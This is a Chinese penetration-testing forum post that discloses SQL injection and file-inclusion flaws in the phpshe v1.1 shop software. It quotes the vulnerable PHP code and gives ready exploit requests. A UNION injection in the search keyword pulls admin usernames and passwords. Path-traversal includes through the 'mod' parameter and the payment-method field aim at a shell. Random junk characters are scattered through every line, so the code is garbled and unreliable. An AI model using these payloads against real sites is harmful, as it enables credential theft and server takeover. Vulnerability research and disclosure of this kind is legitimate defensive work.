中国网络渗透测试联盟

标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell [打印本页]

作者: admin    时间: 2013-4-19 19:01
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell
/*******************************************************/
& e( Z! Q  [9 r$ a! l, L) ]7 Q/ D/* Phpshe v1.1 Vulnerability
$ n  @0 Z, w2 Z" J  i% Y/* ========================
+ H' {" |7 \* A+ ^1 Z/* By: : Kn1f3
) h$ j% ~9 l3 @7 h" J/* E-Mail : 681796@qq.com
: l0 J- x& R! ]/*******************************************************/4 m/ H1 ^: L2 q2 u
0×00 整体大概参数传输" |& u# h4 @0 V6 G+ l9 p5 `- w; T

3 z& q/ Z5 ]* m& r& Q! g* l% l( B, h4 ]$ N" n2 |4 N' q
: H9 x- i4 U: v
//common.php5 |) h7 u! B) z8 m
if (get_magic_quotes_gpc()) {2 h1 l0 b, s9 B. A( F
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');/ p# k" E7 @/ P/ n$ S
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');$ Q, }* N: }9 e: {
}1 A2 W3 k: X# y2 _8 q" j
else {" U& {+ W# e- j
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');1 C- _5 q) J# w& M: [+ e" ?  P5 v  ^
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');$ {8 r3 w2 D( f; R3 g
}
" h# _. F. o: w/ Z, v0 \9 Ysession_start();/ W$ s5 i+ T# S( c, {
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
, N7 q" d* f" J: y/ P!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');+ q  p9 X+ M$ K9 Z
* ]  P% j8 w! D. e" Q3 ?
0×01 包含漏洞
; f, K- [0 X0 h) w9 G/ a. X
$ D7 V8 }: H9 R, R# e3 n
8 I: ]4 E  q% u  m/ k0 {' E
//首页文件! z+ R1 w: K& M. t
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);* y; `5 c* t( U3 p+ Y, ?
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
. b& z- @( s( S; z2 R* Vpe_result();
7 ^2 R  O3 }; q/ w# N, w, N( c% u?>
$ {/ z% h- S! C8 d4 A2 ^//common 文件 第15行开始
6 t; w9 @( E  W- x; turl路由配置' s7 X) z2 p6 V# @! B$ s2 a9 s
$module = $mod = $act = 'index';
/ X- E. Q- G. c: z$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
% z/ V2 p+ q1 x8 v8 m4 I$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
, v$ \* o- S, d9 m- n$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
# G4 ]3 l2 l* @7 Y& v" R9 f2 X% b//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
# l9 \. q8 l  e! `$ z

4 O/ @( P" ]0 s3 n6 O

8 O' ]5 B8 z0 q7 B9 a$ Y! d 0×02 搜索注入7 ]9 V4 U. C. e4 c
* e# q, ?9 F+ k- j
<code id="code2">

//product.php文件
0 x* Q0 f; a$ e% gcase 'list':
' u$ F% L- v7 o$category_id = intval($id);  E- o" R: j5 I
$info = $db->pe_select('category', array('category_id'=>$category_id));
$ K8 A( o5 J# Y1 s7 m//搜索  @2 P* E5 c' @! N
$sqlwhere = " and `product_state` = 1";# `/ x$ }9 D  h$ X* S
pe_lead('hook/category.hook.php');: w1 v9 A5 c% Q0 T
if ($category_id) {6 B; z# I' v! t) O) R
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
3 Y5 i  Z0 S/ I}2 G# S; @: `; B, j2 S# c1 Z. B
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤1 e, p- s$ K. W1 q, k+ l) |, P
if ($_g_orderby) {  M) y! \! u5 e0 C/ H$ V  [( _
$orderby = explode('_', $_g_orderby);
1 v4 d$ |5 t3 W/ G+ w! C$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";% G! L. l% \  q2 X( ^& ^
}
9 b/ Q- u' F6 q4 z) Yelse {7 z& k  q5 [7 l
$sqlwhere .= " order by `product_id` desc";9 u/ w# ~. q! Z5 @
}0 B6 M! j, A% S  c+ c
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));- u/ I; K  q$ H3 \, K
//热卖排行
/ ]. k" F7 {+ C9 Y* a8 L: D% k  x$product_hotlist = product_hotlist();
5 l+ O6 Y# k, o# Y8 j$ D/ J//当前路径
& d/ L3 E5 A" T: f, Y3 }1 b9 G$nowpath = category_path($category_id);
% Q" H. g, R+ G% |7 [1 \$seo = pe_seo($info['category_name']);: v. m8 M/ C2 W- t  y
include(pe_tpl('product_list.html'));
( g3 ]$ \) Z5 f/ b, |+ n. |2 {//跟进selectall函数库
6 E  m# r# A/ Q3 W5 Q- W: Zpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())3 V2 D  \- ]( S: p/ j; L
{
$ O/ b0 J3 [3 G$ J//处理条件语句
0 r, J, k% B1 \  A0 W$sqlwhere = $this->_dowhere($where);
  [$ f+ `6 p2 u( a/ v, o( Nreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
% A% R; m6 X$ B0 z1 m}+ |2 y, s2 D1 F$ I* ?
//exp/ d( u) i9 z7 S
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1; L! F) f& k# `- Z* T: Q

</code>
) f, m2 y" ~4 J
0 L8 L7 T% M% J, V) ~6 H) v# ?0×03 包含漏洞2$ d. b: O: n  p  H7 E" }
: L. V. M$ l% Y+ p# P7 r$ e
<code id="code3">

//order.php

case 'pay':


4 L1 D3 D( B' o: M, @$order_id = pe_dbhold($_g_id);


( |. i+ ]& ?/ P5 x7 t  U4 Y0 z$cache_payway = cache::get('payway');


) b& B% N. o$ Eforeach($cache_payway as $k => $v) {

4 x* X% ?. f5 x
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


! x/ U! H* E5 tif ($k == 'bank') {

' x# u9 q# Q$ ]& Q
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


8 }8 ^5 L0 ]! E/ J" a7 @}


3 i! Q+ Q4 o: ]$ b4 h. k}


+ l6 P% M0 j  d9 ^$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

, ?( r) i# X7 F& v! l
!$order['order_id'] && pe_error('订单号错误...');


; D9 D$ N4 U2 r$ {' R% Vif (isset($_p_pesubmit)) {


# e1 p; O) F% U3 e( E1 h* Bif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

$ Q' K5 ?& {; ~" x0 I$ h
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


7 H  ]  j9 Q4 i+ o- K5 l- M" Eforeach ($info_list as $v) {

4 v& E! `6 x" r
$order['order_name'] .= "{$v['product_name']};";
8 Q. _; k; B% c2 s( v8 r" g


1 e# |( Q  K9 @2 A}

+ f8 _* U5 P+ d, m2 Y0 N8 j7 S
echo '正在为您连接支付网站,请稍后...';

# G$ J1 e% w1 U! i1 Y
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

! `6 R% w+ X* n. @) D
}//当一切准备好的时候就可以进行"鸡肋包含了"

) g% y1 d+ X2 E- K# q
else {


, }- V# b2 a% S! x/ n7 @! b6 C9 Mpe_error('支付错误...');

2 R8 t$ `; W% N2 R
}

5 i3 U0 b9 m0 i2 U% g- s5 b
}

8 B) C" |: r, @+ S% L
$seo = pe_seo('选择支付方式');

; l* t; ?& h9 T' @: z- Q7 g- j' ]
include(pe_tpl('order_pay.html'));

- ^7 ~6 ~5 e. M1 v' S/ I
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>1 {5 x$ r# S4 i





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2